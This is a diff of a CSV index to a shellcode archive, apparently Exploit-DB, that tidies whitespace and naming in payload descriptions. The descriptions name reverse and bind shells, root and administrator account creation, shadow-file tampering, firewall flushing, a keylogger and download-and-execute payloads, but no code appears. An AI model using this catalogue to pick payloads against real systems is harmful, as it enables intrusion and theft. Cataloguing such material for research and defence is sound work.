 13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
-13581,shellcodes/windows/13581.txt,"Windows  (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
-13582,shellcodes/windows/13582.txt,"Windows  (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
+13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
+13582,shellcodes/windows/13582.txt,"Windows  (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
 13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
-13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2)  (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
+13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
 13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
 13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
-13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3)  (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
+13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
 13615,shellcodes/windows_x86/13615.c,"Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
 13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86
 13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86
@@ -325,9 +325,9 @@ id,file,description,date,author,type,platform
 13635,shellcodes/windows_x86/13635.txt,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
 13636,shellcodes/windows_x86/13636.c,"Windows/x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
 13639,shellcodes/windows_x86/13639.c,"Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
-13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
+13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
 13645,shellcodes/windows/13645.c,"Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
-13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3)  (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
+13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
 13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
 13649,shellcodes/windows/13649.txt,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
 13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
@@ -359,12 +359,12 @@ id,file,description,date,author,type,platform
 13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
 13719,shellcodes/windows_x86-64/13719.txt,"Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
 13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
-13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow +  sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
-13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
+13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
 13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
 13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
 13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
@@ -380,7 +380,7 @@ id,file,description,date,author,type,platform
 13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
 14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
 14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
-14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
+14052,shellcodes/windows/14052.c,"Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
 14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
 14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
@@ -404,10 +404,10 @@ id,file,description,date,author,type,platform
 14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86
 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
 15063,shellcodes/windows_x86/15063.c,"Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
-15116,shellcodes/arm/15116.cpp,"Windows/ARM  (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
+15116,shellcodes/arm/15116.cpp,"Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
-15202,shellcodes/windows_x86/15202.c,"Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
-15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
+15202,shellcodes/windows_x86/15202.c,"Windows/x86 (XP Professional SP3) (English) - Add Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
+15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
 15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
@@ -422,7 +422,7 @@ id,file,description,date,author,type,platform
 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
 17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
 17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
-17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
+17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
@@ -450,7 +450,7 @@ id,file,description,date,author,type,platform
 22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
 40890,shellcodes/windows_x86-64/40890.c,"Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
-24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
+24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
 25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
 40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
 27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
@@ -471,8 +471,8 @@ id,file,description,date,author,type,platform
 35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
 35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
 35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
-35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
-35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
+35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
+35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
 36411,shellcodes/generator/36411.txt,"Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
@@ -568,7 +568,7 @@ id,file,description,date,author,type,platform
 39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
 39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
-39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
+39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
 39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
@@ -581,7 +581,7 @@ id,file,description,date,author,type,platform
 40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
 40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
 40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
-40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10)  Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
+40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
 40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
 40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
@@ -681,7 +681,7 @@ id,file,description,date,author,type,platform
 43687,shellcodes/linux_x86/43687.c,"Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes)",2009-05-31,gunslinger_,shellcode,linux_x86
 43688,shellcodes/linux_x86/43688.c,"Linux/x86 - exit(0) Shellcode (8 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 43689,shellcodes/linux_x86/43689.c,"Linux/x86 - sync Shellcode (6 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
-43690,shellcodes/linux_x86/43690.c,"Linux/x86 - execve(/bin/sh_ -c_ ping localhost)  Shellcode (55 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+43690,shellcodes/linux_x86/43690.c,"Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
 43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(th1s s3rv3r h4s b33n h1j4ck3d !!) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
 43694,shellcodes/linux_x86/43694.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)",2018-01-14,"Hashim Jawad",shellcode,linux_x86
@@ -731,19 +731,19 @@ id,file,description,date,author,type,platform
 43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",shellcode,linux_x86
-43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using  JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
+43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86
 43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86
 43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86
 43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86
 43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86
 43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86
-43758,shellcodes/linux_x86/43758.txt,"Linux/x86 - execve() + ROT-7  Shellcode (Encoder/Decoder)  (74 bytes)",2009-01-01,"Stavros Metzidakis",shellcode,linux_x86
+43758,shellcodes/linux_x86/43758.txt,"Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)",2009-01-01,"Stavros Metzidakis",shellcode,linux_x86
 43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
 43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
-43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Admin User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
+43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Administrator User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86
 43762,shellcodes/windows_x86/43762.c,"Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)",2009-01-01,OpTix,shellcode,windows_x86
-43763,shellcodes/windows_x86/43763.txt,"Windows/x86 (XP Professional SP2) (English) - Wordpad Shellcode (15 bytes)",2009-01-01,Aodrulez,shellcode,windows_x86
-43764,shellcodes/windows_x86/43764.c,"Windows/x86 (XP Professional SP2) - calc Shellcode (57 bytes)",2009-01-01,cr4wl3r,shellcode,windows_x86
+43763,shellcodes/windows_x86/43763.txt,"Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes)",2009-01-01,Aodrulez,shellcode,windows_x86
+43764,shellcodes/windows_x86/43764.c,"Windows/x86 (XP Professional SP2) - calc.exe Shellcode (57 bytes)",2009-01-01,cr4wl3r,shellcode,windows_x86
 43765,shellcodes/windows_x86/43765.c,"Windows/x86 (XP Professional SP3) (French) - calc.exe Shellcode (31 bytes)",2009-01-01,agix,shellcode,windows_x86
 43766,shellcodes/windows_x86/43766.asm,"Windows/x86 - Download File (http://skypher.com/dll) + LoadLibrary + Null-Free Shellcode (164 bytes)",2009-01-01,Skylined,shellcode,windows_x86
 43767,shellcodes/windows_x86/43767.asm,"Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)",2009-01-01,Skylined,shellcode,windows_x86
@@ -752,11 +752,11 @@ id,file,description,date,author,type,platform
 43770,shellcodes/windows_x86/43770.c,"Windows/x86 (XP SP3) (Turkish) - calc.exe Shellcode (53 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
 43771,shellcodes/windows_x86/43771.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
 43772,shellcodes/windows_x86/43772.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86
-43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
+43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86
 43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86
 43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm
-40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
+40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
 40781,shellcodes/windows_x86-64/40781.c,"Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64
 40821,shellcodes/windows_x86-64/40821.c,"Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
@@ -822,7 +822,7 @@ id,file,description,date,author,type,platform
 43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
-43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
